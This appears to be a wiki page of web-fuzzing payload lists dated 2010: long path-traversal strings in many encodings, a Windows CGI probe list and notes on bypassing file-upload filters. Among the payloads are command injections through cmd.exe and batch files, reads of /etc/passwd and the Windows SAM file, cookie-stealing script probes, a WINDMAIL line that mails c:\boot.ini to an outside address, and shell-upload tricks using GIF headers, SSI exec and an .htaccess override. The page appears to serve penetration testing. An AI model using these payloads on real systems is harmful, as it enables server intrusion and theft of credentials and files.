0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
